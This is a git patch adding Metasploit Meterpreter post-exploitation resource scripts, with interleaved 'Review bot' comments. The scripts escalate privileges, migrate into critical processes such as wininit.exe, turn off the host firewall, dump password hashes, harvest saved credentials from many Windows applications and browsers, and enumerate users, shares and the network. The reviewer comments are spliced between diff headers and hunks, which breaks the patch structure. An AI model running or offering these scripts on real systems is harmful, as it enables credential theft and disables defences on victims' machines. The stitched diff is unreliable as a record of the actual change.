From 84e3080bc7e8ac20de87f42a872c18116786b70b Mon Sep 17 00:00:00 2001
From: Edo -maland-
Date: Thu, 1 Sep 2016 11:26:39 +0700
Subject: [PATCH] Added post exploitation
---
postexploit/auto_migrate+killfirewall.rc | 3 +++
postexploit/cred_dump.rc | 29 ++++++++++++++++++++++++
postexploit/fast_migrate.rc | 4 ++++
postexploit/gather.rc | 18 +++++++++++++++
postexploit/sysinfo.rc | 4 ++++
5 files changed, 58 insertions(+)
create mode 100644 postexploit/auto_migrate+killfirewall.rc
create mode 100644 postexploit/cred_dump.rc
create mode 100644 postexploit/fast_migrate.rc
create mode 100644 postexploit/gather.rc
create mode 100644 postexploit/sysinfo.rc
diff --git a/postexploit/auto_migrate+killfirewall.rc b/postexploit/auto_migrate+killfirewall.rc
new file mode 100644
index 0000000..0e6930f
--- /dev/null
+++ b/postexploit/auto_migrate+killfirewall.rc
@@ -0,0 +1,3 @@
+run post/windows/manage/migrate
+
+run post/windows/manage/killfw
diff --git a/postexploit/cred_dump.rc b/postexploit/cred_dump.rc
new file mode 100644
index 0000000..5a9655c
--- /dev/null
+++ b/postexploit/cred_dump.rc
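Review bot: In postexploit/auto_migrate+killfirewall.rc the `run post/windows/manage/killfw` line changes the target's security posture, and the script neither documents that nor pairs it with a restore step. Going by the module path, it turns the host firewall off, which would leave an in-scope machine exposed to third parties for the rest of the test. I would add a header comment such as `# Modifies target state: host firewall is turned off; record in the engagement log and restore during cleanup`, and split the state-changing step away from the migrate step so it is never run by accident. For defenders, a firewall state change shortly after a new remote session is a high-signal event worth alerting on.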
@@ -0,0 +1,29 @@
+getsystem
+sysinfo
+show_mount
+screenshot -v -p dump.jpeg -v true
+run post/windows/gather/enum_logged_on_users
+run post/windows/gather/hashdump
+run post/windows/gather/credential_collector
+run post/windows/gather/credentials/wsftp_client
+run post/windows/gather/credentials/winscp
+run post/windows/gather/credentials/windows_autologin
+run post/windows/gather/credentials/vnc
+run post/windows/gather/credentials/trillian
+run post/windows/gather/credentials/total_commander
+run post/windows/gather/credentials/smartftp
+run post/windows/gather/credentials/outlook
+run post/windows/gather/credentials/nimbuzz
+run post/windows/gather/credentials/mremote
+run post/windows/gather/credentials/imail
+run post/windows/gather/credentials/idm
+run post/windows/gather/credentials/flashfxp
+run post/windows/gather/credentials/filezilla_server
+run post/windows/gather/credentials/meebo
+run post/windows/gather/credentials/coreftp
+run post/windows/gather/credentials/imvu
+run post/windows/gather/credentials/epo_sql
+run post/windows/gather/enum_ie
+run post/multi/gather/pidgin_cred
+run post/multi/gather/firefox_creds
+run post/multi/gather/filezilla_client_cred
diff --git a/postexploit/fast_migrate.rc b/postexploit/fast_migrate.rc
new file mode 100644
index 0000000..0432e70
--- /dev/null
+++ b/postexploit/fast_migrate.rc
@@ -0,0 +1,4 @@
+getsystem
+run migrate -n wininit.exe
+sysinfo
+getuid
diff --git a/postexploit/gather.rc b/postexploit/gather.rc
new file mode 100644
index 0000000..1614a3f
--- /dev/null
+++ b/postexploit/gather.rc
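Review bot: postexploit/cred_dump.rc has no header comment stating the session type it expects or how the harvested material is to be handled, although every line from `run post/windows/gather/hashdump` down pulls password hashes or stored credentials. A short `#` header naming the required platform (the module paths suggest a Windows Meterpreter session), the authorisation it assumes, and where the results are stored and who may read them would make the script reviewable. `show_mount` and `screenshot -v -p dump.jpeg -v true` are not credential steps and repeat lines in gather.rc, and `firefox_creds` and `credential_collector` are likewise run by both scripts, so one of the two files should own each step. Read defensively, the list is an inventory of application credential stores (FTP clients, VNC, Outlook, browsers) whose saved passwords should be minimised or monitored on managed hosts.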
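Review bot: In postexploit/fast_migrate.rc the `run migrate -n wininit.exe` line is written in a different form from `run post/windows/manage/migrate` in auto_migrate+killfirewall.rc, and nothing explains why the two scripts differ. wininit.exe is a critical Windows process, so a failure there can presumably take the host down. That risk to the system under test deserves a comment such as `# Touches a critical system process: may destabilise the host; confirm the rules of engagement allow it`.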
@@ -0,0 +1,18 @@
+getsystem
+sysinfo
+screenshot -v -p gather.jpeg -v true
+run post/multi/gather/env
+enumdesktops
+run post/windows/gather/enum_logged_on_users
+run post/windows/gather/enum_shares
+show_mount
+run post/multi/escalate/cups_root_file_read
+run post/windows/gather/dumplinks
+run post/windows/gather/enum_snmp
+run post/windows/gather/arp_scanner
+netstat
+arp
+run post/windows/gather/usb_history
+run post/multi/gather/firefox_creds
+run post/windows/gather/credential_collector
+run post/windows/gather/enum_applications
diff --git a/postexploit/sysinfo.rc b/postexploit/sysinfo.rc
new file mode 100644
index 0000000..34a5151
--- /dev/null
+++ b/postexploit/sysinfo.rc
@@ -0,0 +1,4 @@
+sysinfo
+arp
+getuid
+pwd
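Review bot: `run post/multi/escalate/cups_root_file_read` in postexploit/gather.rc does not belong in this script: by its path it is an escalation module aimed at CUPS, a Unix print service, while the neighbouring steps are Windows enumeration and the file is named as a gather script. I would drop the line so that gather.rc stays read-only enumeration, and state that scope in a header comment, e.g. `# Enumeration only: no escalation or state-changing modules`. The script also opens with `getsystem`, which is itself an escalation attempt and should be called out in that comment or removed for the same reason. `firefox_creds` and `credential_collector` repeat steps from cred_dump.rc.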